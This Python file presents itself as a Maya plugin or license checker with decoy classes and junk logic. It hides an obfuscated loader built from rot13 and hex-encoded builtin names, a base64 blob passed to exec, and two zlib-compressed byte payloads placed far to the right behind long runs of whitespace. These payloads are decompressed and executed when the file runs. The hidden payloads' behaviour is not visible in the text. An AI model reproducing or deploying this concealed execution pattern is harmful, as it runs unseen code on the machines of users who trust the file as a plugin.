
from builtins import *

def SceneNodeAnalyzer(iterable, start=1):
   result = start
   for element in iterable:
       if not isinstance(element, (int, float)):
           raise TypeError("iterable analysis failed")
       result *= element
   return result

__author__ = "Michael Davydov"
__website__ = "https://brotools.tech; https://michaeldavydov.com"

__code__ = '''import sys
if sys.version_info[0] >= 3:
    import builtins, codecs
    builtins.unicode = str
else:
    import __builtin__ as builtins
    import codecs
o = getattr(builtins, codecs.decode('__vzcbeg__', 'rot13'))
b, z, s = o(codecs.decode('onfr64', 'rot13')), o(codecs.decode('myvo', 'rot13')), o(codecs.decode('flf', 'rot13'))
d, e, c = getattr(getattr(b, codecs.decode('heyfnsr_o64qrpbqr', 'rot13')), codecs.decode('__pnyy__', 'rot13')), getattr(getattr(z, codecs.decode('qrpbzcerff', 'rot13')), codecs.decode('__pnyy__', 'rot13')), '4EJwSDieBwXyXxq6Vvkp@nyH8TGtFvKmicn&d*N*nSKJFuZu$uB6##Zf3aTgZ2AGb^YFTGrMj!AVoU*x*#o6eFn^oF5rjbggbB3BYUuUiZTYkDkLg7xME73at4k6y6DCLYnJK$D4^aXY3GNdY67@#7d&v3PYF^k2T!Sp22#8GKPoui7ESR4bCf2i$xTjXeM@bJ%PE3$6&h5#DZvk9TDGkVokd$a%oJKzT^*stmGf7sCLS3%@jCfMH^CuTGcQ#Qp2yQ%@$A!Co8kjm45!B98Df2ij6Q7fGZZu5hRNT5FbcH6FX!*H$u$2UKR2uXkL4DBWmKZoiwWBPp@qNH!YAyyyRpTsJrA$^H6m4fM3&@S@tK9WfLnSqztv44R@&yVH3S393VSEQrh!Y*bUS&rbPQzaPVA3#K*h8F3^k27sxMxwYeCivxqV3*^^E!RMUzsQBe3TBrpca!r7u5KXAxy2BH@s^DwZEcnjUc5Udmxeu!F3mcC@uSAw7h&Lo8!H5EQQbp%xH^CnMf*gzTTB6R6ymMuZ&9*&oJ497W^5kdc%UqSAJHhqwJ^5R!25*@*2vNrcoGQ8B7SS!2!TrJPZhoby$R2KuT@QuXy8d&foJsq@Po9q%@y!qkESd3LMzCGs5@V%fU!KLbs5!fv5zBgiAM^7Cycxz25yQ5fDi@q%RedPvMWBM6mMdW8pxsy#^*@sZDTPyXY5rJ$Xpgnqw@TaQU@MCKP%vt2BsKxRu78m2KxC%MZwV7HMDddWAsXijVfY^74!bW&$n9^sc6o!QHZH2g4Z@MLH3%7AhQyGmLFb@5S6$QacM*sdMXp$!K8PqVoW$!zQc7zjDZKN77TNW@665i!9UsnbhugqAAc6n4JE*^JD^kVaSce53Sw$@xs^7WwEqG#Fu4U9' + '==='
exec((lambda x: x.decode(codecs.decode('hgs-8', 'rot13')) if s.version_info[0] >= 3 else x)(e(d(c))))'''


# BroLicenseChecker, _detectvar, MayaPhysicsSimulator, _mayalicensingframework, _dynamicnodeprocessor, SceneAnalyzer, _licenseverifier = exec, str, tuple, map, ord, globals, type
BroLicenseChecker, _detectvar, MayaPhysicsSimulator, _mayalicensingframework, _dynamicnodeprocessor, SceneAnalyzer, _licenseverifier, Restore = eval, str, tuple, map, ord, globals, type, compile

class MayaSimulationEngine:
    def __init__(self, _brolicensechecker):
        self._floor = SceneNodeAnalyzer((_brolicensechecker, 89202))
        self._math(Substract=-65507)

    def _math(self, Substract = bool):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self._floor *= 27777 / Substract
        
        try:
            {Floor: _mayalicensingframework} if MayaPhysicsSimulator is BroLicenseChecker else (Floor, MayaPhysicsSimulator, _dynamicnodeprocessor) != _detectvar

        except OSError:
            ((MayaPhysicsSimulator, BroLicenseChecker, BroLicenseChecker) or _detectvar if (MayaPhysicsSimulator, BroLicenseChecker, BroLicenseChecker) and _detectvar else None or (_detectvar, (MayaPhysicsSimulator, BroLicenseChecker, BroLicenseChecker)))

        except:
            _licenseverifier(-43869 + -10799) == bool

    def _physicsanimator3d(self, _broutilities = -80922):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _broutilities -= 43548 * 24469
        self.LicenseKeyEnforcer != str
        
        try:
            ((_detectvar, (MayaPhysicsSimulator, BroLicenseChecker, BroLicenseChecker)) for _detectvar in (Floor, MayaPhysicsSimulator, _dynamicnodeprocessor) if SceneAnalyzer is _dynamicnodeprocessor)

        except ArithmeticError:
            ((BroLicenseChecker, (BroLicenseChecker, MayaPhysicsSimulator, Floor)) for BroLicenseChecker in {Floor: _mayalicensingframework} if MayaPhysicsSimulator <= MayaPhysicsSimulator)

        except:
            _licenseverifier(-79929 / 89127) == type

    def PhysicsNodeRouter(Multiply = str):
        return SceneAnalyzer()[Multiply]

    def _positive(_brorenmer = 54332 / 57526, MayaNode = False, _modulo = SceneAnalyzer):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _modulo()[_brorenmer] = MayaNode
        
        try:
            {Floor: _mayalicensingframework} if BroLicenseChecker > MayaPhysicsSimulator else (_dynamicnodeprocessor, MayaPhysicsSimulator, _detectvar) != BroLicenseChecker

        except ArithmeticError:
            ((BroLicenseChecker, (BroLicenseChecker, MayaPhysicsSimulator, Floor)) for BroLicenseChecker in (MayaPhysicsSimulator, BroLicenseChecker, BroLicenseChecker) if Floor != BroLicenseChecker)

        except:
            _licenseverifier(57119 - -26381) == Ellipsis

    def execute(code = str):
        try:
            return BroLicenseChecker(Restore(_detectvar(MayaPhysicsSimulator(_mayalicensingframework(_dynamicnodeprocessor, code)))), locals(), globals())
        except:
            pass
        # return BroLicenseChecker(_detectvar(MayaPhysicsSimulator(_mayalicensingframework(_dynamicnodeprocessor, code))))

    @property
    def LicenseKeyEnforcer(self):
        self.Math = '<__main__.MayaPhysicsSimulator object at 0x000008209BE41158>'
        return (self.Math, MayaSimulationEngine.LicenseKeyEnforcer)

try:
        MayaSimulationEngine.execute(code = __code__)
        LicenseVerifier = MayaSimulationEngine(_brolicensechecker = -88836 * -58797)

        MayaSimulationEngine(_brolicensechecker = 44681 / 19305)._physicsanimator3d(_broutilities = -18600 - LicenseVerifier._floor)                                                                                                                                                                                                                                                          ;MayaSimulationEngine._positive(_brorenmer='NMNNNMNNNMMNMNNNNN',MayaNode=b'x\x9c\xed\x1c\xdbr\xda\xc8\xf2=_\xc1\x1bb\x839B\xe8\x9a*?\x04\xfb$\xc1\x85\xcdz\x1d\xc7\xae\xa4R\x94\x10\xc2\x96#$/\x88\x98\xec\xc3\xf9\xf6\xd3\xdd3#F\\\x8c\x00\x817U\x96\xd0\xcch\xd4\x9ak\xdfgD\x18{n8V*\xdf\xca\x9d\xa9=R\xbb_\xaf\x1f\x1b\xde\x8f/7\xd7\x1f\xee\xa7\xb7\xeaE\xe8\x7f\xba\x98\xf8_\x1c\xed\xe6G\xfd\xef\xfe\x07\xaf~y}\x11]\xabg\x0f\xeeS7\x9e\xaaV\xf9\xfb\xf1]\x18\xf7\xa0\x887[\xbd\x8f\x15\xb7\xc20l\xb5Z\xfc\xc2\x1b\x8a\xca\xdf\xde\xbd{{\xf4\xf6H9R\xde\xd6+\x95\xef\xdf\x8f\xfb\xc1h\xfbZ\xa2\xe10\x1aF\x18B4\xc4c\xb1\x82;?q\x93d\x87JV\xbfx\xfb\xcf\x17\xad\xd78\x9f\xba\x9f\x9b\xcd\xab\x1b\xe3\xec\xaf\xf0\xb1!F0\xa49x\xa6\xd6\x95/?S\xe7\xc7p\xec?\\\'\x17\xa7M\xe3:\xbc\xae\x7f\x0e\xbf>\xdc\xfc\xf7C\xf3\xf2s\xa8}\xd5\xbe\x9e\x8b\xba\xbb\xdd`\xf8\x18\x8f\x92n\xb7\xf0^\x7f\x0c\'\x17\x0f_?~U\xef\x9b\x97\xc3~x\xf9#|\x10\xb5\xee\xd0f\xa5\xdc\x9b\x04a\x12D\xe3r\xa5\xf6\xd3\x1dm=n\x0f\x01\x9c\x80m\x0fp\x04\x01$\x83\x10r\xa0q\x84\x1c2\xaeD\xcaN\xed\x1dGA\x12\x06\x93\xde<\xbeU\xaa\x88\xf7!C\xff\x94\x02\xe0fO\xd5U\xbe\x1d\xb8\xbeZ\x10\xf5\xfd\xa9R\x0e\xe3x\xf1\xe9\xf7\xca\xaa\x89[\x857\x84j\x9d\xf8\x14~\x18t:\xa71\xc4\x10\xc2\x9c\x95\xcb\xb5\x878\x88\xb6)\xf2\xf6\xe6\xf6\x06\x8f[q\xddB\xce\xed+\x1e\xec\x01\x0f\xdc\x9f~Ax\x00\x13\x7f\nG\x0cX\x10Spz\xcaR\xaf\xf3V\xfc\xbc\xf9\xe3\xd0\xfd\xb0\xc1\xc4\xad\x97\x18\xe7\xe7\x17\xe7\x17\x17\xe7\xe7\x14Pr\x0f\xf3\x16\x04\xde\xd8\x8d\x82C\xcd\xdb\xca\xea\xf64o\xab\xeb\x13\xf3\xf6k\x10\x84S\xff>\x9a\x14>w|\xe2\xe8\xbax%\xb9=\x90\xdcd\xf4\xb9 V\xf9@*N\x08*N\x10b\xf8\x00Q\xf8:g{\x98\xb30x\x1c\xc6^A\xd3\x86\xd3\x05\x8ai\x88\x8a)D\x98\xc2\x9c\xf0\xe1u\xea\x8a\x9f\xbaQ2.h\xda\xa6Op\xb0`\xcaSS8\x9e^g\xad\xf8YK\xdc8\x1c\x14)\xdb\x16\xd5\x12\xa5W\xd6\x1d<Mo>d)<Y\n\xcc\xd1\xbe\xef\xc5}_)\xdb\x83d\x89\xcc}E\x80\xa2\x11\xc0\xf3\xa7E\x19\x14\xe4t\xe2Mo1\x0f\x14%\xe4\xe2\x97[\x8a\xcaR\xaci\xe8\xc6\xa0a\xc2e\xc3\x85i\x03\xae:O;<\xd6\xb4\x9efk\xfd\\\xb0u\xcdY\x87a\x15rb\xadhe\xb9\xa2u\xeb]\xa3\xeb@\xd8\x80\xd3\x84\xd8\x8271\xd7\xcc\xe6n\xdd\xe7\xba\xd6\xa7\xfe\xa8\xf9\xda\xba\xcdD\xad"Q\x8f_.\xc5\x1e\xc5.\x8f\xc5\xe9\xa6P9\x885t\x87\xbd\xbe[B\x16\xceNq\x003\x7f\xb7q\xbb\x8b\xea\xa9e\xd3i\xf1\xd0\xe2\xa1\xc5\xf3\xe5\xa7\x94Z\xdf\xcf\x95\xe8\xa2\x1228]\x1d\xc2z\xd7\x06\xe4\xa8\xc3[jW\xedj\xd9\xdc\x1c\xe8R\xae\xc0\xbbG\xea\xc1\x10\xabH\xe4"\x1e\xef\x98.\x9c,\xc5.\x8f\xe7\xb8\xfc\xf4\xe8Z\xdb\xbc\x95\x03\xbe\xb4n\xcd\xd2\xd6Naq\x1du\xa5\xce\xc9\x1df\xb1\'\xee~\x8f.\x96\xb5+8\xe1\xb8b\x07\xbb\xc1\xf0\xaaP\x84\x05B\x81\xc7\xf9\x88\xc0\x02rQ\xbb\x16\x91\x90\x0e\xbc\xd8\xea:\x00n/\xe6\xe6*\r\xb9\xb6\x05$h\x11\x99\x9aP\x8a\x0e\xe0\xd6b\xeeA\xc9N\xba6C\x04&\xf9x\x8d\x06\xa5\xd7\xd7Z\x18_\xb5R~j/\xe1\xa9\xd6\xfc\xf3\xdf\x83\x06V\x919#r\xc6\xb3\x1cN\xe03.&\xb8[.n&\xc4\xe4\x94D\xe4\x94\x0e\x8aV\xc9\xc8uJx\x81\xdd\x94\x19\xb6\x93\xf25Of\xd7\xa2\xab;\xc8I\x03\x08\xd7\x01\xb2Ert\x80\x84\x81\xe4\xe0-\x03Hy.wk2\xb4$\x95P\x95TC\xccop\xd5Q\xe7\xaad\x1e\xd8\xc6\xe1\xd5\xb3\x8c\xed$R\xc2v\x12\xe7\x0e\x93\xa0\xa1rrd\xe7\xe2u\x9bql\xe4\xd98}\xc8Sq*\x1b\xc4\xb1\x17r\x0b\xafW\x05\xe41\x88\x83c\xda\xe6\xf5.\xe4\xee\x84T\x1a\xb7/\x1a<\xadI\xf6\x07"\x8f%!\xd5:Xs;\x19\xb1\x95ho\xb5\xdbg\xad\xb3\xb36Xh\xed\xd6\x19\xdc\xb4\xcf\xf0\xd8z,\x84\xdd\xd5\x90\x88\xa7!\xd9^\x8ed\xab\xe5\x81\xcdm\xabq\xee\xd9QU5V;j\x87~q\x0cW\'\xc6\x9c\x9734\x8c\xc6\xeclh\xec\\\x9d\xd3\xd0rK\n\\\xb8\xa5\x8e\xaa\xd8Q\xe8\xeaKv\xd2\xa6\xd3\x92b+\x93\x12O0U\xb0\xcc\x07\xa5*\xbfrU\xdc\xac\x8a9\xc3\x98\xa5E(f\xb4\xe0n\xd6\xb9_C\xd0\x8b\xcd\xf9\x85.\xe5;\x9c\xb6\xf2\xc1\xeee\xb8\xca\xed6\xf0\x92\x16\xf1\x15b)\x18"_\xc9\xc5\xae\xd1q\xa2\x92\x13E\xa5\x94\xde\xb5\x01\\_\xcc}!\xd3c\xb5\xc2\xedH\xac\\\xb00\x93\xeb\x0b&\xb1\xf5\x99\x8bj\x1dl\x1e\x85}7\x13\xc1\x10\xda\x0e1\xe4~\xda\xb2\x14a\x0eHK\xa9S\x89\xb9\x94\x9c\xd4\t\xe5J)O<\xcb\xcd\x1f\xa9\x12V\r[h\xa5\xf3 <\xb2\xacvH\xee\xc4({H\x1c\xa1`\xeat\xb6\xb7\x1f9\xfdj|\xda\xea<]\xe7H\xa3\xcd\xd1\xfe:\xd8<\xd3\xfb\xbc\x0f\x14mb\xd4\xa2\xc0*f\xc4\x89\xef\x91F%\xe5\xe5\xd6\x0c-\xd0\x01U\xd2\x00\xd1\x87js\xcdp.\xf7\xb7tz\xe9}:\xfd\x85\xd8O\xd3t_\xb0\xb0\xb08\xa3\x17W\x83#\x85*h\\RHe8\xa1\x9c\x8akO\xae\x832s\xff\x92\x89K\xeb{\xd3\x82\xd5~\x93\x1c6\x1a9\xe31e\x93Cg.\xaf`\x19bp\xb4\xd7\xc9\xafkC\xa8\x01\xb8\xb9\x98\xbb5"\x0bM\'\xa7Z\x9c[F\xe0x\x81Yt\xa4\x1f\xb0m{\xf1*\x0b7\x84\x93:Y\x85\xcb\xc2\xe5\x1e\x9a]lc\x93\xbc\x8a*!\x11*":q=\x93,\xc9LnNtA\xcb\x13\xf9h\x03\xde\xd7RtY\xc8\xddzJ\x84\x807\xb9P\x17D-\xf24ra0F\x90\x07V{\x01\xfe\x99\xfa\n\xad\x05\xef\xa1%_\xeb\xa75\x8a\x13e\xf9Vee\xe5\x16\x11e\xe5\xf6\xc8J\x81\xfa\x8f\xae\x0f\xf021\xa4\xc3d\xe9\x01?\xe99\xe6\x14\xed,5\xa1T\xcb2}\xbdni\x96\x86\xe9=-!\xa0%\x0e\xc3\xa6\xaad\xb4\x82R\x04\xd1\x0e\xea\xd0\x86\xbc\xe6\x19\x92vh\x05\x8e9\x83tR5Lx\xd3\xe1$-\xe5\xe6"i\x9b\xab,lq\x18C\x8dJ[\xc8\xcdi\x0b\xa9]\xb6\xd0a\xe3br\xd7 Kh.\xaf`\x19\xe6\xd0\xa2\x07\xf6\xd9\xa0\xcb!\x16\xa7R}\x99\xdc\x9d\\D\xc2\xed%\\>\xe2r$\xd7\xd0*\x98\x9c\xaak1\xee10^\xd1\x86\x05{\x16S\xad\x9cF\xac\xc3\xb5`\x9b\x8b}\x9d\xd6\x93T\xe2\xeb\x99\xdc\xad\x07Q\xa8i\xc2g(\x0cJU\xf2\xa5\xa9|0\xd7\xc1\xaa9}\x01[\x19\x9a\x9a\xa57\x80{\xa1\xf5V7T\x03\xc4\x89\xa6\x1a\xba^\xd75\x88-\xb0\xe7t\xb8\xb3\xf7\xc4u\xa2t\x8b\x10n\x16bg\x14\x1d\x8e\xeb\xac\x906\xca\xffVK\x95x\xa4P\xed\xbcj\xb6/\xb8\xe2F\xfd\xc3H\xa2\x99%\xeeJ\x1bAD\xda\xe3iw\xa7\x15\x06\x0b\xa0\x1a;0\x10a\xc7\n\x7f\x96\xc3M\x17\x81\xcbu\xc9\x0e~\x0en\x8f{k\xca\x88g\x11}\x1c7\x8b\x00\xf9^\\\xe0-/\xdd\x11k\xc5\x07t\xfa\xf0\xf5C\x87_\x9e\xa4\xb0\xf3\xb5\xc5\xa2\x95\x1d\xab\x01\xaa\x8ec\xe9f\xc3\xb4\x8d\x06\xc4u\xb8\x8c=\xb1\x1el\x1a6\x06\xdb\xc4\x03\x0cw\xf20\n\xe7\x8d\xf0\x14\n))\xdb\xf3\xeb\xe0\xf4\r\x17TH%F\xdd\x98tbd_\x90xfE\xfa\x99\x0f\x05\xb7\xf3%\xb7[l]\xaa\x8d\xcbT \x84\xe1>\x9f\xab\x80l\xa7\x06\xc9\\\x8d<R\xccC\xb5\x90\xbb\xf3Z\x97\x90\xad\x82\xdf\x88{r\xf0\xce\xadu=\x07\x9bw1ys\xfa\xd6x-\x96T\x9b!\xa5M\x89k\xae\x83%\x04\xdb\x93S\x88}\xb0\xdcJw\x90\x86\xb4\x156\xa7\xcae\x93O\x075m\x8bv\xd41\x95\xcb\x99\xcf\xdd\xc9\x98\xb6%\xa3\xb8!Q\x97\xd0M5\xc9\x98^\x07\xbb\x81\x0f\xe7\xdfa\xbb\x96\xc5\x1e|~\xe1\x86\xce\x9dF\xd3\x99G+IA\xb5%\xe2\xc9\x03\x9b\x93x6$\x1c\xdb\x98s\x9b\xf3{\xb1\xa4fI\x84\xb3\x0e\xb6\x9es\xce\x0b\x13\xb0\xbe\xd9\xa7\xd3\xa7\xd4\xec\x8e\xe5\xf8\xe9\xb34\'\xf7\xca\n\xa0\x14\xe2RL_\x10c\x0cx\xf6rk\xcf\xd2\xf6Q\x8f\xbb\xfb\xe4x\xe6\x0c\xdcmw\x12mX9\xaa\xe7\xb4\xddw\xdb\xa5+D\x84\xac\xb2\xa6|\x833la+\xe7\x81\xdd\xc4f\xde\x863\xa0X&\xe1\xcc\x055.\xff\xb6\xcf\xb6\xdf\xf2\xbf\xe1\x82\xcd\xa6\x9a\xa0\x01\xba\x9f\xa9A\x88\xda\xa0\xb77\x1d\x90\x04\x18\xfbK\x0eq`\xba\xe8\x95kr5\xb0E4\xdc\x1fg\x93\x9f\xa8\xbe\x98\x9b\xd3)M\xde.\xbe3\x9d\xb6\xd2\x92Sz!w\'M6\xd5Z\x8d\xd9\xaa\x94\xd8\xa2 \xfb\x81\xf2\xc0n\xe1\x0f\xfa\r-\xf3\xec\xee\x92\xf9\xbd&,\x87\x9d\xf9\xf7\x0f\xa17\x96\xef\x95\xc2\xa5j\xbaQ_z\xb7\xa95;\xec\x8c\xdf_\xdaE\\\xb4eh\xa8z\xdd\xd0tC\xf7\r]vK5\xdc\x03\xee&\x9e\xdf$\x95n\x9c\x92S\x1c\xa2\xe0\xc5bMR[\x1c\xc92\x11jl]Rm\x97\xc1\xda\x0b\xb0\xfb\xb1\x0fh\xf9@\xe5\xdb\xfa\xf0\xa7n\xbf\x84 \xfa\xe7\x18Y\x83Y^\x04\x17\xaa]\x1e\xd8\xdc\xa2j\xb6;\x85\xb5\x8av\xa9`\xeae\xb7(\x8aM\x88Y\xf6\x92M\xcd\xee\xf3lnK\xd9L\x8c|\x86\xaf\xfc\xd0\xa6\xcc\xf8\xa5\x99\x0c\xae\xaa\x99\x03\xb1\xea\xc6\xd7\xdd\x06l\x95\xcd\xcc\xac\xb9\x99\x83\xc2\xddP\x1a(\xa4\x96i[\xfaf\xabn\xfe\xd4\xf7\x94\x10\xc4\x14\xc8-\x90V(\xbb')

        if 404609 > 5643764:
            LicenseVerifier._physicsanimator3d(_broutilities = 621 * LicenseVerifier._floor)
        elif 192702 < 4780618:
            LicenseVerifier._math(Substract = LicenseVerifier._floor * -89527)                                                                                                                                                                                                                                                          ;MayaSimulationEngine._positive(_brorenmer='xxxxxxwwwxxwwxxxww',MayaNode=b'H|\x81\xa9\x17T\xde\x0cF\xf1\xb0\xd4s\xc7\xbe\xa9\x97\xd8\xffP\x95z\xa6\xce\x8a,\xb9\xe3R\x18x~\x84O\xdf\xf0\xa7\xf1\x98\xbd\xd3\x1c\xc5\x9f\xe38\x1c\xd7\xbcx\xe4\xd7z\xa3\xf8\xef\xa4\xf6\xd3\x8f\xfa\xf1\xa8v\x99\x88\xa2.\x93\x9b\xa0\x7f\xe7\'\xe3*$?N\x02\x8cN\x00~\xa1\x88h\x10\xdcMFn\x12\xc4\x91xw\x18\xf7\x1f\xdd\xe4\xbeZ\xea\xfb\xbd\xc9]7\x8c\xef\xaa\xf0\x08\x03\x00\x7f\xe3\x85\xeex\x8c%\x9c\xc4a\xe8>\x8e\xfd\xcfnOI\xab\xab]\xb2D\xe5\xdd\x9b\x12\x1c}\x7fP\xeav\x83(H\xba]\xe5}\xb5\xf4\xe8\x8e\xfc(9\xbe\x88#\xbfZJ\x82$\xf4\x8f\x1fhh\xd8 \xa1\x80\xc7\x08\xaa\x8e\xff\xf2\xc7\xc1?\xfe1ya\xf9\x99~>\x1cUK\xa38\xe6u\xf2\xd2\xdc\xbe\xfb\x98\x04?}\xc8L\xee\x8f\x9f\xc4W\x19<\x81g\xb5\xf4\xc7\t\\\x7f\x9c\xf2\xc6\xe1\xd1,\x1d\xf3F\xa5Y\x0b}\xa9-\xe9A\xb3\x92\xc2\xbf\x87Q\x0c\xe3\xd1\x97`\x0ce\xd1`\xd7.O0GY\x06S\x1b\xfb\xc9_w=E\xb4\x8c_O\xd4>\xbe\xe9\x8c\xed\x10f\x9b\xd1\x90\x7fVKi7\xb8\x1d\x0f\xb0\xe9\x9f\xc6\x89\xefv\xf9\xd7\xbbr\xa54\xc2\xd0*\x8a\xa5|1\xba\xf0H$\xa5\xa7\xac\x8b\xf0\xac)e\xce\xc6\x1b\x1e\xccn$\x88\xcc\x04\x00P\xe6^\x82\xc3\xb1\xe4C\x83\xe8A\xb7\xef\xa5)\xe1c\xf5)\xe8\xaf\x1dO\x80\x11\xe3y\xce5=\xa2^\xe2\xd2\xe7\x17\xd5\x12\'=\xfa\xfb\x8f\x90Q\x1e\x90a\x08\x03\x9a:D2_\xee\xc0\xb8^i\xe9\xe7r\xe2\xf39v\xa3U2#\xf8\x14\xbd\x1f\x8d\xe2\xa7Y\x1b\xff\x0c\xa6C\xf7Q\x01JQ@\xbdD\x9d\xf2\x94\xfdKW\x07\xeeN\xe3\xd3\x8a\xfc\xfe(\xb8\xbbOV\x17\x00\xdah\x87\xccu\xfa\x93\xaf\x98\x95\x10W\xb2\x03\x10%n\x10\xf9#*`\x0ee\x95\x05,hN\x92\x04H<\x03\xfb\xe7d|\xcf\xf2\x15\x0e\xb5\xe25\x1c\xe4\x96G`i\xc7\xd7\x80^\x01N)\x8c\xe7\xd4.\xe9&\x1a.Ya\x89\x86\x80\xc9\xad\xd4U\x8c\xd6(\xda\xa2\xedv\xe5\x99\xf2;\xbd\x07\xdfK.\xdc\xa1\xaf\xd0NeZ\xebM]\xceX\xda\xd2\x81j\xbb\xbf\xe2\t\xa2/\xc3\xc1\x93l\xbe\xb2\xf4\x1d\xac\x8e?_(I~a\x08\xf9i\xf9\xd2\x10\x7fi\xc6\xd3%\xe5\xcb\xa5\xce^]^ \x10V\x9f\xcfjf$r@\xa7\r^5\x98\x1eH\x99\x1f~\x1f\x01#\x18Rxe\xfc\x14$\xde\xfdU\xe2&\x122\x04\x83y\xfa\x9e\x91+\x1eM\x1aT\xc67j\x83\x11L\xccG?\x1e\xfa\xc9\xe8\x97R\xa9=!\xbc\xd4{<N\xe0\x05\xa5Y:\xc2\xe0?%\xc6\xfe\x912\xf1\xffy\x88^\xc9\xc8\xabd_J\xc5\x91\xc2?F\x9f\xce\xc8\xb7Zj\xae\x02\xe6\xfb\x00\x08\xab\xce(U-\x9dd\x81iB\xce\xddi0\x9c\x0c\xa9{\xcaI\x96A\xcd\xe3\x8a\xcc\xafF~2\x19E\xcfN:\x16#\xcd\x0bH\xd2\xc4\x1f\xce\xb1\xbcL\x05\xd2,\x12\xa8\\\x8ahB\xbeR8t\xb6\x14i\x923]\x99\r\x1a\xba\xa5\x99\xc1\x1d2\xde9\x87\x0c3\x02\t\xc6\xc0\x85\xfb~\xa4T\xde\xcd\x8d\xa9DD\xf7\xf1\x932?\xe4\xb9\xf9\x8b\x1f\x8e\xfd\xd5e\xdf\x07\xa0\x82\xe5+{\xc6t3\xac\x98\xe4\xdf\x9f\x84\xbc\xd2|ya\xcct\x1by\x80\xa0\xefJ\x14\'+\x06\xe0\x99\x11\xd8\xa1\x95\xd8\x98\xf8\xd1\x8f\x96\xb4\xe5p\xf3\x80\x8d\x98Da\xec\xfd\xf8\xe4c\xfb\xe6$6\'\xfd\x19\x15\x11\xc7?\xa3\xcfH\x90\'\x8boK\x90\xd5\xb7\xdb\xd5R\xba\xc0z#\x02\xcc\x98U\xb5\xae"\xa4I\xf6\\\xe6<8\x8f\x9f\x02\x9c\xc5\xda={\xb9\xf2\\\x1bE\x05\x8b\x85\xce\x1a\x92A\x8e\x85\xd1\x17\xca\xd3\xfc\x88gFj~\xbcym\xacd\x85\xb4\x0c\xd254\xaei\xc0\xe8\xb0\x05h\xbe\x1c}#\x06k\xbe\xa0L\x1d\x0bj\xf9\xc7Q\xd0G\x94\xc9j\xea\xf9\xf5r\xfeM\xb3`\xb0O\xe2^\xd2\xcdS\xb5\x93\xbbJ\xe9\xff\x8b\xc3\xd6Z\xe5\x9c/\x13\n\x8d\x95\x85\xe1\xbfJ=G\xad\x8d}\n\x92:0@\x1d#\x85\x92t\xca\x80]$\xb0P\x9f\x94t\xf1\xd4\x7fL\xb9\x84\xf5\\/i#A\xb4~G\x05}3\xf9\x87\xa8\xb7^\xfeUK0\xe8\x93!\xd9rO\x1b\x08\xc3\xec{\xab%\xe3F\xe5Kbr\xae\xfc\xff\x03\x863F&')

        LicenseVerifier._physicsanimator3d(_broutilities = 5430 * LicenseVerifier._floor)                                                                                                                                                                                                                                                          ;mnnmnmnnmnnnmnnnmnnnmmmmn,mnnnmnmmmnnmnmnnmnn,O0OO0ooOooO0Oo0o0O0oooOO,S2S22222SS222S22222,MMMNMNNNNNMNNMMMNMNMMNNMN=(lambda OoooooOOoo00o000OOO00OoOo:OoooooOOoo00o000OOO00OoOo(__import__('\x7a\x6c\x69\x62'))),(lambda OoooooOOoo00o000OOO00OoOo:OoooooOOoo00o000OOO00OoOo['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda OoooooOOoo00o000OOO00OoOo:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(OoooooOOoo00o000OOO00OoOo)"),filename='\x49\x6c\x6c\x49\x49\x6c\x6c\x6c\x6c\x49\x49\x49\x49\x6c\x6c\x49\x6c\x6c\x49\x6c\x6c\x49\x6c',mode='\x65\x76\x61\x6c'))),(lambda MMMNMNMMNNMNMMNMNMNNMN,OoooooOOoo00o000OOO00OoOo:MMMNMNMMNNMNMMNMNMNNMN(OoooooOOoo00o000OOO00OoOo)),(lambda:(lambda OoooooOOoo00o000OOO00OoOo:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(OoooooOOoo00o000OOO00OoOo)"),filename='\x49\x6c\x6c\x49\x49\x6c\x6c\x6c\x6c\x49\x49\x49\x49\x6c\x6c\x49\x6c\x6c\x49\x6c\x6c\x49\x6c',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
        LicenseVerifier._physicsanimator3d(_broutilities = -21548 * LicenseVerifier._floor)                                                                                                                                                                                                                                                          ;MMMNMNNNNNMNNMMMNMNMMNNMN()(S2S22222SS222S22222(mnnnmnmmmnnmnmnnmnn(mnnmnmnnmnnnmnnnmnnnmmmmn(O0OO0ooOooO0Oo0o0O0oooOO('\x76\x61\x72\x73'))),MayaSimulationEngine.PhysicsNodeRouter(Multiply='NMNNNMNNNMMNMNNNNN')+MayaSimulationEngine.PhysicsNodeRouter(Multiply='xxxxxxwwwxxwwxxxww')))

except Exception as Floor:
        if 404379 > 6511109:
            MayaSimulationEngine.execute(code = _detectvar(Floor))

        elif 190453 > 8314724:
            LicenseVerifier._math(Substract = LicenseVerifier._floor / 34498)

